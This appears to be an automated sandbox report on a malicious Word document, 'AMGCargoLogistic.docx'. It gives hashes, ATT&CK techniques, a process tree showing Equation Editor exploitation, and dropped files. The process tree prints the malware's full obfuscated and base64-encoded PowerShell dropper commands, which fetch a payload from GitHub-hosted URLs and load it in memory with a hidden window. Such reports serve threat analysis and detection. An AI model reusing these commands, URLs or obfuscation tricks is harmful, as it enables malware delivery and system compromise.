a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5

Analysis

max time kernel
101s
max time network
105s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30/09/2024, 16:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AMGCargoLogistic.docx
Size

770KB
MD5

cde646bbf76aa0cb430f71ec2408b4bd
SHA1

40fbea905916fc49bfcaf203b3b15e78d9053df5
SHA256

a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5
SHA512

22cea88742a8a11813bbc68fc661a5ed63bac3b20c4b8c718367737f3265c859a2506815f6a80fbc39c8ebbb4ebcae0adb7414e61c0660b66e7da94ec2002801
SSDEEP

12288:hNCRJClLkChwGm0LpsjYJ46gvycWL5c7PasQB2i4MYJv/u8wdyAxd6mzoGf2S2AM:h4ClKL0CjY7EDWQisQB2tXupdyZGt2AM

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	2124	EQNEDT32.EXE
14	2164	powershell.exe
15	2164	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3040	powershell.exe
2164	powershell.exe

Abuses OpenXML format to download file from external location

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com
15	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2124	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2140	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3040	powershell.exe
2164	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeShutdownPrivilege	2140	WINWORD.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2140	WINWORD.EXE
2140	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 404	2124	EQNEDT32.EXE	33
PID 2124 wrote to memory of 404	2124	EQNEDT32.EXE	33
PID 2124 wrote to memory of 404	2124	EQNEDT32.EXE	33
PID 2124 wrote to memory of 404	2124	EQNEDT32.EXE	33
PID 404 wrote to memory of 3040	404	WScript.exe	34
PID 404 wrote to memory of 3040	404	WScript.exe	34
PID 404 wrote to memory of 3040	404	WScript.exe	34
PID 404 wrote to memory of 3040	404	WScript.exe	34
PID 2140 wrote to memory of 1312	2140	WINWORD.EXE	37
PID 2140 wrote to memory of 1312	2140	WINWORD.EXE	37
PID 2140 wrote to memory of 1312	2140	WINWORD.EXE	37
PID 2140 wrote to memory of 1312	2140	WINWORD.EXE	37
PID 3040 wrote to memory of 2164	3040	powershell.exe	38
PID 3040 wrote to memory of 2164	3040	powershell.exe	38
PID 3040 wrote to memory of 2164	3040	powershell.exe	38
PID 3040 wrote to memory of 2164	3040	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AMGCargoLogistic.docx"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1312

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

Filesize
128KB

MD5
aff3f0cbb98276eb33640cef68b34762

SHA1
bdd3ff0ab692e0932967f4940308b15b8d5b6391

SHA256
a7056067ffa681b19423364cb4d645d6bf2b374f69d19517e0c8a11d7a0d623f

SHA512
2810a5067817d799d0e5ccf473ca68d453ce33d10ad82c543706c9f2447b742ba20f76878f75d07e577dc742b30f4bfb931b8392a4a44bb5c57471aca366d40f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{1A196B54-DF10-4B56-8A07-DB57482CFD1F}.FSD

Filesize
128KB

MD5
1b905127aff62db21959bce609b657c4

SHA1
0f1f01f0e8308dc133b65cc6092af6ee320ee8aa

SHA256
369b3b48619f270d79706dbb513c738b7ca11916e0d2db21d76d4ee99c6d136e

SHA512
c03d99b0124f96a1e0a9df638dfdc085baba4994e7539bfc8a4049cf76e30003d844d4c00302d98543ee4c4afcf5a5c1f222b7c7d217f30679426886ef4c6683

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
7acc54687967079be6b6360e6e52ccf1

SHA1
6b39206058f1e1f05dc4611377f204bbb9f56b65

SHA256
743100dfb902ae88673ff87c79f4e578f788ed3d9a19c06c0365862cbca1a8ae

SHA512
efd4b9553ab90d37cd11348f179199cacd4a2f984c376b1d9ef65d2cd49f610711436ac0e5a7a46bd512cbe0269dd065def09639516080181e5558df3a79577a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6688F3CD-DF37-4B3A-8AF0-17BBCA2748D5}.FSD

Filesize
128KB

MD5
1fe65f39a9dc62599767fc6757032c24

SHA1
14fc46e2bd4b3d9c5ab0bce96ba524f28795e605

SHA256
e4317779f5626ceac21c4bef09c63b6fdb625b95f1401b24f65aa37a19e1eac2

SHA512
1a33ce051a3a3b33d6c8ee332e13772ca0c9987e730251ff873460d20ac2df19348940dde8d319e0f62deb1c5fa3ed1052b197e2da62ca947080e25eca9817c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\56KJ964X\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc

Filesize
112KB

MD5
5ead5713e1263695bff52404264dd3b4

SHA1
19420de3c322f058f5c55d6c2a18cf27bd2ce856

SHA256
dc2e7684f8c21142383906e061be62128064d2be6c8eb15c773eae3952615281

SHA512
a4b678ecc350cabab55dac7d79b735cf9f2c79738037ae5bd1a290d13f5eeff7e791b37f6a47fe9cf6d0ba061f8d3b0fd235c867b655ee378db39d0d874b8906

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86312D75.emf

Filesize
208KB

MD5
33b91cbffe8e675c476b0ba3afc61062

SHA1
447b4d09f2d65dbfb28462556a33a047394e8d97

SHA256
c81de0eec367cc4fddadc14b92ea89be12c856acd249d45f93fcd69a8d50fd79

SHA512
3ebb6f881334115b52fc4f426a4f681b22645b967fa03bf367c43cd7bb078c74bbfb7f41abbb6132429704cb6e338808468e607298b999b63c7d246da03750f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F7DA44.emf

Filesize
311KB

MD5
1e74425f96a5ddd00e5494225278c22a

SHA1
97d7adc10c419f1ebf2b2754cdfefd3371cd95b9

SHA256
420c08455abff24376b505bc34ee9021a10c5bf5285d3fd038778409ec78b67c

SHA512
e0232c415e1171aaba244152f0d4cdd8328e0ef051fc24cfd2b472199a0ae41a451401a3492c04a612a9acd3407047047c8a170a4b2a68eb80b4b862b699ea1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B77E744B.emf

Filesize
131KB

MD5
a01193c207cd2fe313f5ceda3fd76b7a

SHA1
62173798263f9d7310f3f5942668dea29aa5a90f

SHA256
6e7bb9f3d39b5a50fa8fd08b066b0a92001beaeae96c9fcbfdb5bcfb9f0f6c20

SHA512
6b4344cc538b502ef1f6d3c9faf2973096b40054a0648078fef21f451ff61a11906e9bef01de80ea4ee032ec8c17877fcc9fb05493512dc210fda7c5f62f3e22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D908ECF2.emf

Filesize
65KB

MD5
7dc8e1999a1af96fe63d5e493356a288

SHA1
705d5c1ffdf27bf31f6408a1f98fa01547375612

SHA256
611408fc701324b9ee55de35ef19aa58103007691865e3900ec6e03bde70f0c9

SHA512
9275dd7d20a0ec72c0e8f1291eeb2237e6464857b50d114e3f615cfc27199eb07256ba65dd04bfdd664eaebcc50909370d0e42fc10da8863c3d6413b54dbb622

Download Submit
C:\Users\Admin\AppData\Local\Temp\{852B4B46-E608-42E5-87AE-25B4BA601477}

Filesize
128KB

MD5
0bbe4493604887de1f5bca05364104f0

SHA1
49fd748a54f94f97e74468e6536ab81fb0c8bf72

SHA256
c687461369e9abbb20248c866ec709bfe887e7864753cb3da5fabdb6124d1132

SHA512
7e7442271bbe497434ce5018ec5c7af198c12064e8c5f986dcbd29ed27c9d4d132d4e6029cb1e40e681332ebe71aa59be0e3727892cc71c744ea007dd657e1bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
a8aae1561f8de01190378358ef74f3a0

SHA1
c3492e9ea502e559c9ab92dd92e7be2356522868

SHA256
c9e4fe3124399d232969571ff44d151d91f379dc0512db44d01527e83f639d53

SHA512
6144daad2b20895d1e6762adbd1ecd38d6d13cf0194c085099f6f0e502ee022296de99ac9dd9897f6baba6ff9828ad9d4af59e8d2b4690f893f24f1b3569827e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
520c45c618a9a76d21c6eca3f199f8bb

SHA1
d0515da68b11fd7cab1558c65cdc5a69bc938245

SHA256
ababf0a69594c7751989f5072eeef7e8b0ef33950657558d77d981cd1d4ebfa8

SHA512
69aee9924ecb264055503548f876125aae306444348db5e0620ae8b4a5930a86bd8cb0b935c7bc589fe71d0c25b40923cb3892cfcf2f680281fed1c872191669

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs

Filesize
241KB

MD5
afa95ffef9a1e2ee01b008da56592b30

SHA1
9d5c767bb2f496377a5a797fc43e8c004530028c

SHA256
4988df74df1ad4b83316bd4d9c110996ba2eb392c7c2adb1422ffb60936611be

SHA512
632136f51d71d7632f70a5dadb1693801461c18c38357ad154b4bd51ee0d84e662952ce29b83996867c5716a2f8d3e325a693e88cd214b9383e9a2ce1ed57ef3

Download Submit
memory/2140-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2140-0-0x000000002F331000-0x000000002F332000-memory.dmp

Filesize
4KB

Download
memory/2140-85-0x0000000070E5D000-0x0000000070E68000-memory.dmp

Filesize
44KB

Download
memory/2140-2-0x0000000070E5D000-0x0000000070E68000-memory.dmp

Filesize
44KB

Download
memory/2140-178-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2140-187-0x0000000070E5D000-0x0000000070E68000-memory.dmp

Filesize
44KB

Download